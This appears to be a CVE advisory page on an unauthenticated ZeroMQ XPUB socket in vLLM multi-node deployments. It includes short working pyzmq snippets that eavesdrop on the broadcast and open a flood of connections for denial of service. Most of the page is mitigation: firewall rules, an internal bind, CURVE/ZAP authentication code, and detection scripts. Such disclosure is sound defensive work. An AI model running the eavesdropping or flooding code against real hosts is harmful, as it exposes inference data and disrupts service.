vLLM uses ZeroMQ for multi-node communication in distributed deployments. The primary host opens an XPUB socket bound to all interfaces (a `tcp://*:<port>` bind), so any client that can reach the port can subscribe to it. Attackers can connect to this socket and read the broadcast metadata, or cause a denial of service by opening many connections that never read. The weakness is the unauthenticated XPUB bind in shm_broadcast.py, where `MessageQueue.broadcast_object()` sends tensor metadata over ZeroMQ while the tensor data itself travels over `torch.distributed`.
DailyCVE Form
Platform: vLLM
Version: Multi-node deployments
Vulnerability: ZeroMQ data exposure
Severity: High
Date: 2025-04-29
What Undercode Say:
Exploitation:
1. Identify XPUB Port (on the host, or by port scan from the network; ZeroMQ never shows up by name in netstat/ss, the listener belongs to the vLLM python process, so look for a bind on a wildcard address instead):
ss -tlnp | grep -E '(0\.0\.0\.0|\*|\[::\]):'
2. Connect to Socket:
import zmq
context = zmq.Context()
socket = context.socket(zmq.SUB)                 # any plain SUB socket can attach to the unauthenticated XPUB
socket.connect("tcp://<vLLM_HOST>:<PORT>")
socket.setsockopt(zmq.SUBSCRIBE, b"")            # empty prefix = receive every broadcast
while True: print(socket.recv())                 # raw frames as sent by MessageQueue.broadcast_object()
3. DoS Attack:
for _ in range(1000):
    zmq.Context().socket(zmq.SUB).connect("tcp://<vLLM_HOST>:<PORT>")   # contexts are never closed, so every connection stays open and is never read
Mitigation:
1. Firewall Rules (accept the worker subnet first, then drop everyone else; a bare DROP on the port also cuts off the legitimate workers):
iptables -A INPUT -p tcp --dport <PORT> -s <WORKER_SUBNET> -j ACCEPT
iptables -A INPUT -p tcp --dport <PORT> -j DROP
2. ZeroMQ Config: Bind to the internal, cluster-facing IP instead of "*" (the port must be part of the endpoint):
socket.bind("tcp://192.168.1.100:<PORT>")   # replace 192.168.1.100 with the host's internal IP
3. Auth Layer (pyzmq has no zmq.auth.install_authenticator or zmq.AUTH; use its ZAP authenticator):
from zmq.auth.thread import ThreadAuthenticator
auth = ThreadAuthenticator(context); auth.start()   # ZAP handler thread answering on inproc://zeromq.zap.01
auth.allow("<trusted_worker_ip>")                    # IP allow-list; every other peer is refused
socket.zap_domain = b"vllm"                          # NULL-mechanism peers are only passed to ZAP when a domain is set
socket.bind("tcp://<INTERNAL_IP>:<PORT>")
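The hardened form of steps 2 and 3 carried through end to end, as an added example written for this page (it is not vLLM's code and not pyzmq's own sample): the XPUB is bound to a specific address, runs the CURVE handshake, and a ZAP credentials provider admits only subscribers whose CURVE public key was registered beforehand. It assumes pyzmq is installed; `KeyAllowList`, `bind_secured_xpub`, `connect_sub`, `broadcast_once` and `demo` are names chosen here, and the loopback bind on a random port plus the `b"tensor-metadata"` payload are constructed for the demonstration.

```python
"""Hardened XPUB broadcaster: CURVE encryption plus a ZAP allow-list of client public keys."""
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator
from zmq.utils import z85


class KeyAllowList:
    """ZAP credentials provider (hypothetical helper for this example, not a vLLM class):
    a client is admitted only if its CURVE public key was registered in advance."""

    def __init__(self, allowed_public_keys):
        self.allowed = {k.encode() if isinstance(k, str) else k for k in allowed_public_keys}

    def callback(self, domain, key):
        # pyzmq hands over the peer's public key z85-encoded; accept the raw 32-byte form too.
        if isinstance(key, str):
            key = key.encode()
        if len(key) == 32:
            key = z85.encode(key)
        return key in self.allowed


def bind_secured_xpub(ctx, allowed_client_keys, host="127.0.0.1"):
    """Bind an XPUB that refuses peers not on the allow-list. Returns (socket, port, auth, server_public)."""
    auth = ThreadAuthenticator(ctx)
    auth.start()
    auth.configure_curve_callback(domain="*", credentials_provider=KeyAllowList(allowed_client_keys))
    server_public, server_secret = zmq.curve_keypair()
    xpub = ctx.socket(zmq.XPUB)
    xpub.curve_secretkey = server_secret
    xpub.curve_publickey = server_public
    xpub.curve_server = True                            # run the CURVE handshake; peers failing ZAP never get past it
    port = xpub.bind_to_random_port(f"tcp://{host}")    # a specific address, never "tcp://*"
    return xpub, port, auth, server_public


def connect_sub(ctx, port, server_public, client_public, client_secret, host="127.0.0.1"):
    """Subscriber side: it must know the server's public key and present its own keypair."""
    sub = ctx.socket(zmq.SUB)
    sub.curve_serverkey = server_public
    sub.curve_publickey = client_public
    sub.curve_secretkey = client_secret
    sub.connect(f"tcp://{host}:{port}")
    sub.setsockopt(zmq.SUBSCRIBE, b"")
    return sub


def broadcast_once(xpub, sub, payload, timeout_ms=2000):
    """Wait until the subscriber's subscription reaches the XPUB, then publish one message.
    Returns what the subscriber received, or None if it never got through (e.g. refused by ZAP)."""
    while xpub.poll(timeout_ms):
        ctrl = xpub.recv()              # XPUB delivers b"\x01"+topic on subscribe, b"\x00"+topic on unsubscribe
        if ctrl[:1] == b"\x01":
            break
    else:
        return None                     # no subscription ever arrived: the handshake was refused
    xpub.send(payload)
    if sub.poll(timeout_ms) == 0:
        return None
    return sub.recv()


def demo():
    """A rogue client with an unregistered key is refused; the registered client receives the broadcast."""
    ctx = zmq.Context()
    good_public, good_secret = zmq.curve_keypair()
    rogue_public, rogue_secret = zmq.curve_keypair()    # a valid keypair, but not on the allow-list
    xpub, port, auth, server_public = bind_secured_xpub(ctx, [good_public])
    try:
        rogue = connect_sub(ctx, port, server_public, rogue_public, rogue_secret)
        got_rogue = broadcast_once(xpub, rogue, b"tensor-metadata", timeout_ms=1000)
        rogue.close(linger=0)
        trusted = connect_sub(ctx, port, server_public, good_public, good_secret)
        got_trusted = broadcast_once(xpub, trusted, b"tensor-metadata")
        trusted.close(linger=0)
    finally:
        xpub.close(linger=0)
        auth.stop()
        ctx.term()
    return got_rogue, got_trusted


if __name__ == "__main__":
    print(demo())   # (None, b'tensor-metadata')
```

The rogue subscriber never gets a subscription through because the CURVE handshake stops at the ZAP reply, so the XPUB sees no `b"\x01"` control frame for it; the IP allow-list from step 3 (`auth.allow(...)`) can be layered on top of the key check in the same authenticator.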
Detection (lsof and ss show TCP listeners, not the ZeroMQ socket type, so there is no "XPUB" to grep for; look for the vLLM process listening on a wildcard address instead):
ss -tlnp | grep -E '(0\.0\.0\.0|\*|\[::\]):' | grep -Ei 'python|vllm'
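The same detection as a script, added here as an example for this page (not vLLM tooling): it parses `ss -tlnp` output for listeners of the inference process bound to all interfaces, and it decodes a ZMTP 3.x greeting, the 64-byte header a ZeroMQ endpoint sends when a connection starts, to tell an unauthenticated (NULL mechanism) socket from a CURVE one. The `ss` lines and the greetings are constructed for the example (via `build_greeting`), not captured from a deployment, and the process names in `INFERENCE_PROCS` are an assumption about how the vLLM process appears on your host.

```python
"""Spot wildcard-bound listeners of the inference process, and classify a ZMTP greeting."""
import re

WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}
INFERENCE_PROCS = {"python", "python3", "vllm"}   # assumption: how the vLLM process shows up in ss

# Constructed sample of `ss -tlnp` output (not from a real host).
SAMPLE_SS = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port  Process
LISTEN  0       100      0.0.0.0:5555          0.0.0.0:*          users:(("python",pid=4242,fd=12))
LISTEN  0       100      127.0.0.1:8000        0.0.0.0:*          users:(("python",pid=4242,fd=9))
LISTEN  0       128      [::]:22               [::]:*             users:(("sshd",pid=900,fd=3))
LISTEN  0       100      *:5556                *:*                users:(("python3",pid=4243,fd=13))
"""

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def exposed_listeners(ss_output, procs=INFERENCE_PROCS):
    """Return [(port, process, pid)] for listeners of the inference process bound to all interfaces."""
    hits = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")   # works for "[::]:22" as well as "0.0.0.0:5555"
        m = PROC_RE.search(line)
        if not m:
            continue
        name, pid = m.group(1), int(m.group(2))
        if addr in WILDCARD_ADDRS and name in procs:
            hits.append((int(port), name, pid))
    return hits


def classify_zmtp_greeting(greeting):
    """Parse a ZMTP 3.x greeting; return (major, minor, mechanism, as_server) or None if it is not ZMTP.
    Layout: byte 0 = 0xFF, bytes 1..8 padding, byte 9 = 0x7F, bytes 10/11 = version,
    bytes 12..31 = NUL-padded mechanism name ("NULL", "PLAIN", "CURVE"), byte 32 = as-server flag."""
    if len(greeting) < 33 or greeting[0] != 0xFF or greeting[9] != 0x7F:
        return None
    major, minor = greeting[10], greeting[11]
    mechanism = greeting[12:32].rstrip(b"\x00").decode("ascii", "replace")
    return major, minor, mechanism, bool(greeting[32])


def build_greeting(mechanism, as_server=False, major=3, minor=0):
    """Construct a 64-byte greeting in the ZMTP 3.x layout; used only to make sample input here."""
    signature = b"\xff" + b"\x00" * 7 + b"\x01" + b"\x7f"   # padding bytes are not significant
    return (signature + bytes([major, minor]) + mechanism.ljust(20, b"\x00")
            + bytes([1 if as_server else 0]) + b"\x00" * 31)


def is_unauthenticated_zmtp(greeting):
    """True when the peer speaks ZMTP with the NULL mechanism, i.e. no authentication at all."""
    info = classify_zmtp_greeting(greeting)
    return info is not None and info[2] == "NULL"


if __name__ == "__main__":
    print(exposed_listeners(SAMPLE_SS))
    print(is_unauthenticated_zmtp(build_greeting(b"NULL")), is_unauthenticated_zmtp(build_greeting(b"CURVE", True)))
```

Port 8000 on 127.0.0.1 is ignored and so is sshd on `[::]`; only the two python listeners on wildcard addresses are reported. After the CURVE mitigation the greeting's mechanism field reads "CURVE", which is the quickest remote check that the fix is actually in effect.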
Patch Monitoring:
Track updates in:
– `shm_broadcast.py` (ZeroMQ socket binding)
– `parallel_state.py` (broadcast logic)
Debugging:
Log connection events on the XPUB socket (pyzmq has no zmq.logger; use a socket monitor):
from zmq.utils.monitor import recv_monitor_message
monitor = socket.get_monitor_socket()                # PAIR socket receiving EVENT_ACCEPTED, EVENT_DISCONNECTED, ...
while True: print(recv_monitor_message(monitor))     # dict with 'event', 'value' and 'endpoint'
Reported By: github.com